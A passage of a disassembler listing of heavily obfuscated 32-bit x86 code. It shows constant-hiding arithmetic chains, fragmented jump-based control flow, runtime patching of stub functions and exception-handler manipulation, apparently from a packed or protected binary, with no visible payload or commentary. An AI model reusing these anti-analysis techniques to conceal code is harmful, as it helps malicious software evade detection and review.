; START OF FUNCTION CHUNK FOR sub_448CBC
loc_446CB6: ; CODE XREF: sub_448CBC-CE94j
rol eax, 0Ah
push eax
jmp loc_4559B3
; END OF FUNCTION CHUNK FOR sub_448CBC
; =============== S U B R O U T I N E =======================================
sub_446CBF proc near ; DATA XREF: sub_4545D8-C946o
push 384363F0h
pop edx
sub_446CBF endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4576C6
loc_446CC5: ; CODE XREF: sub_4576C6:loc_455F22j
sub edx, 76CC8058h
rol edx, 16h
add edx, 19CFA258h
jmp loc_43C2C5
; END OF FUNCTION CHUNK FOR sub_4576C6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_446CD9: ; CODE XREF: sub_43AA94+B14Dj
jno loc_44BDC4
jp loc_454F54
jmp loc_447C6C
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
test eax, ebx
jmp loc_43CCBD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D79C
loc_446CF1: ; CODE XREF: sub_44D79C:loc_43E84Cj
mov eax, edi
pop edi
xor eax, 6B75D433h
add eax, 0E86468BAh
add eax, ebp
push edi
push 0FEBFACF6h
jmp loc_43F722
; END OF FUNCTION CHUNK FOR sub_44D79C
; ---------------------------------------------------------------------------
call sub_4402A5
; START OF FUNCTION CHUNK FOR sub_452D56
loc_446D12: ; CODE XREF: sub_452D56+776Ej
jmp loc_45994C
; END OF FUNCTION CHUNK FOR sub_452D56
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D1F0
loc_446D17: ; CODE XREF: sub_44D1F0+2BDj
jz loc_44C369
loc_446D1D: ; CODE XREF: ut7h7i2x:0043CDE4j
jmp loc_450017
; END OF FUNCTION CHUNK FOR sub_44D1F0
; ---------------------------------------------------------------------------
pop ebx
jmp loc_44C363
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E700
loc_446D28: ; CODE XREF: sub_43E700:loc_44A643j
pop ebp
xor ebx, 9030B4CEh
test ebx, 200000h
jmp loc_44C807
; END OF FUNCTION CHUNK FOR sub_43E700
; ---------------------------------------------------------------------------
mov ds:dword_41D0C4, eax
lea eax, nullsub_511
mov byte ptr [eax], 0C3h
jmp loc_43CD44
; ---------------------------------------------------------------------------
pop edx
mov eax, [esp]
push edx
call sub_4439B0
mov eax, 86480F55h
jmp loc_43B282
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DB21
loc_446D62: ; CODE XREF: sub_43DB21+173C0j
call sub_44E65D
loc_446D67: ; CODE XREF: ut7h7i2x:00453910j
jmp nullsub_312
; END OF FUNCTION CHUNK FOR sub_43DB21
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DEFF
loc_446D6C: ; CODE XREF: sub_44DEFF-3539j
jmp loc_441C1F
; END OF FUNCTION CHUNK FOR sub_44DEFF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44875F
loc_446D71: ; CODE XREF: sub_44875F-82A9j
jmp loc_441D6C
; END OF FUNCTION CHUNK FOR sub_44875F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FA50
loc_446D76: ; CODE XREF: sub_43FA50+2E02j
mov eax, [esp+0]
push ebp
mov ebp, edx
xchg ebp, [esp-8+arg_4]
call sub_452E7F
jmp loc_45A678
; END OF FUNCTION CHUNK FOR sub_43FA50
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_446D89: ; CODE XREF: sub_4524FE:loc_44CC85j
push offset sub_446F14
jmp loc_448EEF
; END OF FUNCTION CHUNK FOR sub_4524FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F7
loc_446D93: ; CODE XREF: sub_43B7F7:loc_43B804j
jnz loc_44DEED
jmp loc_454D4C
; END OF FUNCTION CHUNK FOR sub_43B7F7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44825D
loc_446D9E: ; CODE XREF: sub_44825D+A638j
jz loc_44A846
jmp loc_43D5FD
; END OF FUNCTION CHUNK FOR sub_44825D
; ---------------------------------------------------------------------------
locret_446DA9: ; CODE XREF: ut7h7i2x:00449BC1j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4499DC
loc_446DAA: ; CODE XREF: sub_4499DC+13j
jmp sub_452361
; END OF FUNCTION CHUNK FOR sub_4499DC
; ---------------------------------------------------------------------------
loc_446DAF: ; CODE XREF: ut7h7i2x:00457AC9j
jns loc_441CC9
loc_446DB5: ; CODE XREF: ut7h7i2x:loc_44E5B6j
call sub_453D8B
mov edx, 7DA6ACC0h
call sub_44ED9F
push edx
jmp loc_4549A8
; ---------------------------------------------------------------------------
shr edx, 18h
xchg eax, [ebp+0]
jmp sub_4561A8
; ---------------------------------------------------------------------------
test al, al
jz locret_4530BD
jmp loc_453F24
; ---------------------------------------------------------------------------
loc_446DE2: ; DATA XREF: sub_43C39B+7o
mov eax, [esp]
push edx
push ebx
push 0F9381AA0h
pop ebx
xor ebx, 172F0A5Ch
jmp loc_448A6B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_321. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44092D
loc_446DF9: ; CODE XREF: sub_44092D-21F6j
jz loc_449AF7
jmp loc_4499C8
; END OF FUNCTION CHUNK FOR sub_44092D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4411BF
loc_446E04: ; CODE XREF: sub_4411BF-421Ej
rol eax, 7
push offset sub_4424D2
jmp nullsub_547
; END OF FUNCTION CHUNK FOR sub_4411BF
; ---------------------------------------------------------------------------
loc_446E11: ; DATA XREF: ut7h7i2x:004434B9o
push eax
or eax, ebx
jmp loc_45521E
; ---------------------------------------------------------------------------
adc edx, edi
jmp loc_443810
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DF79
loc_446E20: ; CODE XREF: sub_44DF79:loc_43D518j
and edx, 9C2152BEh
mov esi, edx
rol ebx, 1Bh
jmp loc_452E09
; END OF FUNCTION CHUNK FOR sub_44DF79
; =============== S U B R O U T I N E =======================================
sub_446E30 proc near ; CODE XREF: sub_455775-1320Cj
push ebp
sub_446E30 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_455775
loc_446E31: ; CODE XREF: sub_455775:loc_44AD01j
push 8F67C003h
pop eax
and eax, 69E1F079h
jmp loc_449D36
; END OF FUNCTION CHUNK FOR sub_455775
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DCFF
loc_446E42: ; CODE XREF: sub_43DCFF+6596j
; sub_43DCFF+1AB71j
add eax, 20B1A12Bh
rol eax, 1Eh
add eax, 5D20080Fh
xchg eax, [esp-4+arg_0]
jmp loc_45A725
; END OF FUNCTION CHUNK FOR sub_43DCFF
; ---------------------------------------------------------------------------
mov ds:off_41D074, eax
jmp loc_459F2B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44947D
loc_446E64: ; CODE XREF: sub_44947D:loc_450815j
pop ebx
or edi, 2498E88Ch
rol edi, 0Fh
and edi, 0D52FA2Ah
rol edi, 10h
cmp edi, 9E925792h
jmp loc_44C85D
; END OF FUNCTION CHUNK FOR sub_44947D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A25C
loc_446E82: ; CODE XREF: sub_45A25C:loc_45309Ej
xor eax, 0E36B5683h
push ecx
push 0DA735562h
xchg edi, [esp+8+var_8]
and ecx, ebx
loc_446E93: ; CODE XREF: sub_440944+1A0AEj
jmp loc_4579CF
; END OF FUNCTION CHUNK FOR sub_45A25C
; ---------------------------------------------------------------------------
mov edx, 20413B0Fh
push edi
push 512E1DE7h
pop edi
or edi, 0B78DCBC7h
test edi, 40000h
jmp loc_444E7B
; ---------------------------------------------------------------------------
loc_446EB5: ; CODE XREF: ut7h7i2x:loc_458BB0j
push offset sub_440DAB
jmp locret_447BFA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445E13
loc_446EBF: ; CODE XREF: sub_445E13:loc_442AAEj
jz loc_44455C
jmp loc_44CDA3
; END OF FUNCTION CHUNK FOR sub_445E13
; ---------------------------------------------------------------------------
loc_446ECA: ; CODE XREF: ut7h7i2x:004395F0j
; ut7h7i2x:00442CAAj ...
js loc_4472B9
cmp dword ptr [ebp-10Ch], 36343831h
jnz loc_43F01A
jmp loc_449CD0
; ---------------------------------------------------------------------------
loc_446EE5: ; CODE XREF: ut7h7i2x:loc_45986Cj
sub eax, 798F471Bh
or eax, 1C6CB8FFh
rol eax, 19h
add eax, 0C75393h
xchg eax, [esp]
jmp loc_455198
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453E26
loc_446F02: ; CODE XREF: sub_453E26-284Fj
xchg ebp, [eax]
or edi, 0A2E6EE3Eh
loc_446F0A: ; CODE XREF: sub_453E26:loc_43F066j
; ut7h7i2x:loc_44CACFj
call sub_458937
; END OF FUNCTION CHUNK FOR sub_453E26
; START OF FUNCTION CHUNK FOR sub_443FC3
loc_446F0F: ; CODE XREF: sub_443FC3+735Fj
jmp loc_448DCD
; END OF FUNCTION CHUNK FOR sub_443FC3
; =============== S U B R O U T I N E =======================================
sub_446F14 proc near ; DATA XREF: sub_4524FE:loc_446D89o
mov [ebp-1Ch], eax
jmp loc_44DCE0
sub_446F14 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_446F1C: ; CODE XREF: sub_4524FE:loc_456D16j
cmp dword ptr [ebp-1Ch], 0Fh
; END OF FUNCTION CHUNK FOR sub_4524FE
; START OF FUNCTION CHUNK FOR sub_43CDBA
loc_446F20: ; CODE XREF: sub_43CDBA+5A6Bj
jnz loc_43A51A
mov eax, [ebp-1Ch]
shl eax, 8
mov edx, [ebp-20h]
movzx edx, byte ptr [edx]
or eax, edx
jmp loc_442E3B
; END OF FUNCTION CHUNK FOR sub_43CDBA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_446F39: ; CODE XREF: sub_442B3B+13CFFj
add edi, 9F87CCB9h
popf
xchg edi, [esp+0]
jmp sub_44ED9F
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B45E
loc_446F48: ; CODE XREF: sub_44B45E:loc_448367j
lea eax, nullsub_18
mov byte ptr [eax], 0C3h
jmp nullsub_18
; END OF FUNCTION CHUNK FOR sub_44B45E
; =============== S U B R O U T I N E =======================================
sub_446F56 proc near ; CODE XREF: sub_40C307+2A6p
; sub_40C307+318p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043D7B7 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043EA4F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00442479 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443584 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446314 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004487F4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449491 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BEA8 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044C82B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044CB6E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DE82 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454626 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00454AEC SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00459F3F SIZE 0000001A BYTES
push esi
push 0BF8B9DA2h
pop esi
jmp loc_43D7B7
sub_446F56 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_446F62 proc near ; CODE XREF: ut7h7i2x:004449C5j
; ut7h7i2x:004504B8p
; FUNCTION CHUNK AT 0044BE69 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457183 SIZE 00000007 BYTES
xchg ecx, [esp+0]
pop ecx
push edi
mov edi, eax
xchg edi, [esp+0]
jmp loc_44BE69
sub_446F62 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F7
loc_446F71: ; CODE XREF: sub_43B7F7+12702j
jz loc_45793C
jmp loc_445F98
; END OF FUNCTION CHUNK FOR sub_43B7F7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45812E
loc_446F7C: ; CODE XREF: sub_45812E+1Cj
add ebx, 0C600C2AEh
xchg ebx, [esp+0]
jmp loc_441061
; END OF FUNCTION CHUNK FOR sub_45812E
; ---------------------------------------------------------------------------
mov edx, 1AE260E8h
call sub_44ED9F
push eax
jmp loc_45708B
; =============== S U B R O U T I N E =======================================
sub_446F9A proc near ; CODE XREF: ut7h7i2x:0043BEA5j
; sub_449EE1+786Ep
; FUNCTION CHUNK AT 0043A763 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004417AA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448443 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044B8D7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C39F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00450968 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00452E28 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453E99 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00454183 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00454FF3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457046 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457B5E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457E7E SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00458445 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459D84 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045A6D0 SIZE 0000000B BYTES
xchg edx, [esp+0]
pop edx
push eax
push 80FCBE1Bh
pop eax
xor eax, 0AF4AD099h
sub eax, 57C7E05h
cmp eax, 0C47F9419h
jmp loc_4417AA
sub_446F9A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44101A
loc_446FBC: ; CODE XREF: sub_44101A+465Ej
push 0A32C3221h
pop ecx
or ecx, 0FA5BD24Bh
xor ecx, 0B5C005D7h
and ecx, 4F4CA994h
add ecx, 0B237E65Ch
jmp loc_44012B
; END OF FUNCTION CHUNK FOR sub_44101A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4549F0
loc_446FDF: ; CODE XREF: sub_4549F0+188Dj
jns loc_454636
popf
loc_446FE6: ; CODE XREF: ut7h7i2x:loc_439383j
lea eax, [ebp-14h]
push ebx
mov ebx, eax
xchg ebx, [esp+0]
jmp loc_44F9ED
; END OF FUNCTION CHUNK FOR sub_4549F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440944
loc_446FF4: ; CODE XREF: sub_440944+B1D2j
or edi, 0BA99B62Ch
add edi, 7BA104C7h
add eax, edi
pop edi
ror eax, 0Ah
push offset loc_450CBF
jmp loc_44B5A1
; END OF FUNCTION CHUNK FOR sub_440944
; ---------------------------------------------------------------------------
loc_447010: ; CODE XREF: ut7h7i2x:004541D1j
add eax, 188A449Ah
call sub_445BB7
; START OF FUNCTION CHUNK FOR sub_44F738
loc_44701B: ; CODE XREF: sub_44F738-31CFj
jmp loc_43C053
; END OF FUNCTION CHUNK FOR sub_44F738
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446320
loc_447020: ; CODE XREF: sub_446320:loc_43D069j
jz loc_449D47
jmp loc_43AF65
; END OF FUNCTION CHUNK FOR sub_446320
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4489DF
loc_44702B: ; CODE XREF: sub_4489DF-D0D9j
jge loc_43C433
push 833E561Dh
jo loc_43F59E
loc_44703C: ; CODE XREF: sub_4489DF:loc_44E9ADj
mov eax, 0BB0E1C2h
push esi
jmp loc_44EBC6
; END OF FUNCTION CHUNK FOR sub_4489DF
; ---------------------------------------------------------------------------
loc_447047: ; CODE XREF: ut7h7i2x:loc_43B809j
jz loc_4408F9
jmp loc_442652
; ---------------------------------------------------------------------------
push offset sub_443459
jmp loc_4582C3
; ---------------------------------------------------------------------------
push 0F4A99362h
pop eax
and eax, 0F5099BB1h
or eax, 4AACAD38h
add eax, 7EF8ED88h
jmp loc_452CB6
; ---------------------------------------------------------------------------
loc_447079: ; DATA XREF: sub_442E76+1052Fo
push esi
push 8DA432h
pop esi
sub esi, 730BBF08h
add esi, 72C1D77Eh
xchg esi, [esp]
jmp loc_439E41
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_447094: ; CODE XREF: sub_43DBEC-3AB8j
sub edx, 0AF8D69D0h
and edx, 8B66D573h
add edx, 760417DCh
xchg edx, [esp+0]
jmp loc_450640
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44602A
loc_4470AE: ; CODE XREF: sub_44602A+1355j
jnz loc_450273
jmp loc_4538CE
; END OF FUNCTION CHUNK FOR sub_44602A
; ---------------------------------------------------------------------------
loc_4470B9: ; CODE XREF: ut7h7i2x:0044901Bj
xor ecx, 3C49232h
test ecx, 8
jmp loc_4456A2
; ---------------------------------------------------------------------------
loc_4470CA: ; CODE XREF: ut7h7i2x:0044ED8Ej
popf
jmp loc_4572EF
; ---------------------------------------------------------------------------
locret_4470D0: ; CODE XREF: ut7h7i2x:00446896j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44FC60
loc_4470D1: ; CODE XREF: sub_44FC60-4590j
jmp loc_43E817
; END OF FUNCTION CHUNK FOR sub_44FC60
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4497C1
loc_4470D6: ; CODE XREF: sub_4497C1+7j
jmp loc_45570A
; END OF FUNCTION CHUNK FOR sub_4497C1
; ---------------------------------------------------------------------------
loc_4470DB: ; CODE XREF: ut7h7i2x:00448DF5j
jmp locret_442610
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448321
loc_4470E0: ; CODE XREF: sub_448321-52ADj
jmp nullsub_115
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
loc_4470E5: ; CODE XREF: ut7h7i2x:0044D843j
jmp ds:dword_41D0A0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_538. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
cmp al, 24h
mov edx, edi
pop edi
jb loc_43BEDA
mov eax, [esp]
push edx
call sub_44C273
jmp loc_45AC6B
; ---------------------------------------------------------------------------
loc_447105: ; DATA XREF: sub_43AF72:loc_454086o
push 3C24179Dh
pop esi
and esi, 0A7FADCA4h
add esi, 0DC2583D4h
mov [esi], eax
pop esi
; START OF FUNCTION CHUNK FOR sub_44DF79
loc_44711A: ; CODE XREF: sub_44DF79-11E4Fj
; sub_44DF79+Ej
add eax, 2B4F102Eh
jmp loc_44741A
; END OF FUNCTION CHUNK FOR sub_44DF79
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C791
loc_447125: ; CODE XREF: sub_44C791-167Aj
sub esi, 496C897Eh
test edx, ecx
jmp loc_43E7AA
; END OF FUNCTION CHUNK FOR sub_44C791
; =============== S U B R O U T I N E =======================================
sub_447132 proc near ; DATA XREF: sub_448321-52B2o
push 0FDF28ACDh
pop edi
sub edi, 655931B6h
or edi, 42AF7C0Ch
jnz loc_452B5E
sub_447132 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_445FA9
loc_44714A: ; CODE XREF: sub_445FA9+AB03j
jmp sub_4396F5
; END OF FUNCTION CHUNK FOR sub_445FA9
; ---------------------------------------------------------------------------
loc_44714F: ; CODE XREF: ut7h7i2x:0044BAA4j
jmp loc_45A1F6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44865D
loc_447154: ; CODE XREF: sub_44865D-E722j
pop ecx
jmp loc_452B57
; END OF FUNCTION CHUNK FOR sub_44865D
; ---------------------------------------------------------------------------
loc_44715A: ; CODE XREF: ut7h7i2x:0043BAC8j
cdq
; =============== S U B R O U T I N E =======================================
sub_44715B proc near ; CODE XREF: sub_44FF66-AB35p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043AE97 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C246 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00459427 SIZE 0000000A BYTES
xchg ecx, [esp+0]
pop ecx
xchg esi, [esp-4+arg_0]
jmp loc_43C246
sub_44715B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_447167 proc near ; CODE XREF: sub_41C2E2+2F0p
; ut7h7i2x:0043AD87j
; DATA XREF: ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043A9A4 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043AD92 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043B916 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004448F9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B1F7 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00452E10 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00457EEF SIZE 00000005 BYTES
push esi
push 2A7259BBh
pop esi
loc_44716E: ; CODE XREF: ut7h7i2x:00441D4Cj
or esi, 6241AF80h
sub esi, 74F572BCh
add esi, 0AC52088h
jmp loc_457EEF
sub_447167 endp
; =============== S U B R O U T I N E =======================================
sub_447185 proc near ; CODE XREF: ut7h7i2x:00449511j
; sub_442E76+173C8p
; FUNCTION CHUNK AT 0043D318 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004413D7 SIZE 0000002C BYTES
; FUNCTION CHUNK AT 00442EA3 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
push edx
call sub_4589FE
mov eax, 0B9726E5Ah
push edi
jmp loc_4413D7
sub_447185 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4549F0
loc_44719A: ; CODE XREF: sub_4549F0:loc_43FA37j
xor eax, 98E5504h
test eax, 1
jmp loc_43CC20
; END OF FUNCTION CHUNK FOR sub_4549F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F43B
loc_4471AB: ; CODE XREF: sub_44F43B:loc_452373j
xchg edi, [esp+4+var_4]
mov ebp, edi
pop edi
retn
; END OF FUNCTION CHUNK FOR sub_44F43B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_4471B2: ; CODE XREF: sub_43EF73+DADBj
jmp loc_4520CB
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449406
loc_4471B7: ; CODE XREF: sub_449406-E38j
jmp nullsub_452
; END OF FUNCTION CHUNK FOR sub_449406
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_4471BC: ; CODE XREF: sub_444273+3D34j
jmp loc_44C4F0
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450231
loc_4471C1: ; CODE XREF: sub_450231-B6CEj
; ut7h7i2x:00446A22j
mov byte ptr [ebp-5], 0
jmp loc_452CA0
; END OF FUNCTION CHUNK FOR sub_450231
; =============== S U B R O U T I N E =======================================
sub_4471CA proc near ; CODE XREF: sub_448FB6:loc_448FC4p
; ut7h7i2x:loc_458BA6j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00439CD0 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043A164 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DD8D SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00441D5B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044324F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044643B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044BA82 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044D603 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045082B SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045192A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00451A52 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00453D6E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455AF4 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00457713 SIZE 00000005 BYTES
push 3A1BEBBAh
pop eax
jmp loc_43DD8D
sub_4471CA endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439D16
loc_4471D5: ; CODE XREF: sub_439D16+12j
sub edx, 66530E67h
and edx, 919A311Bh
add edx, 0EEB54B60h
xchg edx, [esp+0]
loc_4471EA: ; CODE XREF: ut7h7i2x:0044A19Ej
jmp loc_44404D
; END OF FUNCTION CHUNK FOR sub_439D16
; ---------------------------------------------------------------------------
pop eax
jmp sub_44577E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_4471F5: ; CODE XREF: sub_4462B0-A8A0j
sub ecx, 0CD04F53Ch
cmp ecx, 0A1FB7BCh
jmp loc_43A3BB
; END OF FUNCTION CHUNK FOR sub_4462B0
; ---------------------------------------------------------------------------
push offset loc_43F212
loc_44720B: ; CODE XREF: ut7h7i2x:0043E3EFj
jmp locret_4503AB
; ---------------------------------------------------------------------------
loc_447210: ; DATA XREF: ut7h7i2x:0044372Eo
or edx, edx
jnz loc_44AA9D
jmp loc_43CDDE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4565B2
loc_44721D: ; CODE XREF: sub_4565B2:loc_452781j
call sub_43CA2D
pop large dword ptr fs:0
add esp, 4
or eax, eax
jmp loc_442AA9
; END OF FUNCTION CHUNK FOR sub_4565B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E592
loc_447233: ; CODE XREF: sub_43E592:loc_44A3ACj
mov eax, offset dword_442EB4
call sub_442262
mov al, [ebp-5]
pop ebx
pop ecx
pop ecx
jmp loc_4567C4
; END OF FUNCTION CHUNK FOR sub_43E592
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_447248: ; CODE XREF: sub_43AA94:loc_44B61Aj
pop ebx
mov eax, 1
shl eax, cl
mov edx, [ebp-20h]
shr edx, 3
mov ecx, ds:dword_4487F0
movzx edx, byte ptr [ecx+edx]
and eax, edx
jmp loc_43B56D
; END OF FUNCTION CHUNK FOR sub_43AA94
; =============== S U B R O U T I N E =======================================
sub_447267 proc near ; DATA XREF: sub_450651+31EDo
mov eax, [ebp-4]
movzx eax, byte ptr [eax]
cmp ds:dword_43C454[eax*4], 0
jz loc_44E259
mov eax, [ebp-4]
cmp byte ptr [eax], 0CFh
jmp loc_44C5E7
sub_447267 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458054
loc_447286: ; CODE XREF: sub_458054:loc_43D573j
call sub_45195C
; END OF FUNCTION CHUNK FOR sub_458054
; START OF FUNCTION CHUNK FOR sub_44865D
loc_44728B: ; CODE XREF: sub_44865D+A418j
jmp loc_444CE0
; END OF FUNCTION CHUNK FOR sub_44865D
; ---------------------------------------------------------------------------
loc_447290: ; CODE XREF: ut7h7i2x:loc_452010j
mov byte ptr [eax], 0C3h
jmp sub_45A907
; ---------------------------------------------------------------------------
locret_447298: ; CODE XREF: ut7h7i2x:0044EA65j
retn
; ---------------------------------------------------------------------------
loc_447299: ; CODE XREF: ut7h7i2x:0044FDBAj
jmp loc_43A187
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44825D
loc_44729E: ; CODE XREF: sub_44825D-B8F9j
add eax, 0A9197212h
mov eax, [eax]
mov al, [eax]
jz loc_43F4CA
jmp loc_452435
; END OF FUNCTION CHUNK FOR sub_44825D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_4472B3: ; CODE XREF: sub_439BF8+170Fj
push eax
jmp loc_44C912
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
loc_4472B9: ; CODE XREF: ut7h7i2x:loc_446ECAj
cmp dword ptr [ebp-10Ch], 36343831h
jnz loc_43F01A
jmp loc_44C730
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A070
loc_4472CE: ; CODE XREF: sub_45A070-14F7j
jl loc_448B90
xor edi, esi
loc_4472D6: ; CODE XREF: sub_45A070:loc_43D604j
call sub_454277
; END OF FUNCTION CHUNK FOR sub_45A070
; START OF FUNCTION CHUNK FOR sub_454596
loc_4472DB: ; CODE XREF: sub_454596+3j
jmp loc_458EE2
; END OF FUNCTION CHUNK FOR sub_454596
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B85E
loc_4472E0: ; CODE XREF: sub_44B85E+Ej
pop eax
add eax, ds:4000F6h
cmp eax, 92154249h
jmp loc_44FEE2
; END OF FUNCTION CHUNK FOR sub_44B85E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454466
loc_4472F2: ; CODE XREF: sub_454466:loc_454475j
jl loc_44EDAE
